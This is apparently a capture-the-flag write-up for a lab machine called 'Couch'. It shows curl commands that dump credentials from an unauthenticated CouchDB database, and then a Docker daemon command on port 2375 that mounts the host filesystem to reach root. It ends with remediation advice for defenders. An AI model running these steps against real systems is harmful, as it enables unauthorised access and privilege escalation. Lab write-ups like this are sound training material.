Target IP: couch.thm (Requires /etc/hosts entry)
Difficulty: Easy
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Couch” is a Linux machine that exposes a CouchDB database instance without authentication. We gain initial access by enumerating the database via REST API (curl) to retrieve valid SSH credentials. Privilege escalation is achieved by analyzing .bash_history, which reveals a command to exploit an exposed Docker Daemon on localhost (Port 2375), allowing us to mount the host filesystem and access root.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): using Rustscan for rapid port discovery.
- T1592 (Gather Victim Host Information): Enumerating CouchDB via API.
- T1078 (Valid Accounts): Recovering SSH credentials from the database.
- T1552 (Unsecured Credentials): Finding exploit commands in
.bash_history. - T1611 (Escape to Host): Docker privilege escalation via exposed TCP socket.
2. Operational Setup
Host Configuration
echo "10.10.x.x couch.thm" | sudo tee -a /etc/hosts3. Enumeration: “Rustscan to the rescue”
A. Network Scanning
Standard Nmap can be slow. rustscan is excellent for quickly identifying open ports before running heavy scripts.
rustscan -a couch.thm -- -sC -sVResults:
- 22/tcp (SSH): OpenSSH.
- 5984/tcp (CouchDB): Apache CouchDB httpd 1.6.1.
B. CouchDB Enumeration
CouchDB uses a RESTful API. We don’t need a specialized tool; curl works perfectly.
Reference: CouchDB Tour
1. Check Connection:
curl http://couch.thm:5984/
# Output: {"couchdb":"Welcome","uuid":"...","version":"1.6.1",...}2. List Databases:
curl -X GET http://couch.thm:5984/_all_dbs
# Output: ["_replicator","_users","secret"]- Analysis: The
secretdatabase looks interesting.
3. Dump the Secret DB:
curl -X GET http://couch.thm:5984/secret/_all_docs
# Returns IDs. Then we query the specific document ID found (e.g., "passwordbackup").
curl -X GET http://couch.thm:5984/secret/passwordbackupResult:
We find credentials (likely for a user named athena or similar).
- User:
athena - Password:
[REDACTED]
4. Initial Access: SSH
With the credentials found in the database, we log in.
ssh athena@couch.thmUser Flag: /home/athena/user.txt.
5. Privilege Escalation: Docker Daemon Abuse
Enumeration (linpeas & History)
You ran linpeas.sh, which usually flags .bash_history if it is readable and contains sensitive info.
cat ~/.bash_historyFinding: The history contains a Docker command targeting a local port.
The Vulnerability
Docker is not just a command; it is a client-server architecture. The Docker CLI talks to a Docker Daemon. Usually, this is a Unix socket (/var/run/docker.sock), but here it is exposed over TCP on localhost port 2375.
If we can talk to the daemon, we can tell it to mount the host’s hard drive into a container.
Exploitation
The command found in history (or constructed manually):
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpineBreakdown of the “Magic” Command:
-H 127.0.0.1:2375: Tell the Docker client to talk to the daemon listening on this local port (instead of the default socket).run: Run a container.--rm: Delete it when we exit (cleanup).-it: Interactive mode (give us a shell).--privileged: Give the container extended privileges (access to devices).--net=host: Use the host’s network stack (optional but good for stability).-v /:/mnt: The Kill Shot. Mount the host’s root directory (/) to the container’s/mntfolder.alpine: The image name.
Result: You drop into a shell inside the container.
# inside container
cd /mnt/root
cat root.txtSince / is mounted to /mnt, the host’s root flag is at /mnt/root/root.txt.
6. Remediation (Blue Team)
- CouchDB Security:
- Authentication: CouchDB should require authentication for all API access.
- Network Binding: Bind the service to
127.0.0.1if it is only needed locally, or use a firewall to restrict access.
- Docker Security:
- Daemon Exposure: Never expose the Docker daemon API (Port 2375) without TLS authentication.
- User History: Periodically clear
.bash_historyor configure the shell not to save commands starting with a space to prevent leaking previous exploit attempts or secrets.
- Secrets Management: Do not store credentials in plaintext databases named “secret”. Use a Vault or proper configuration management.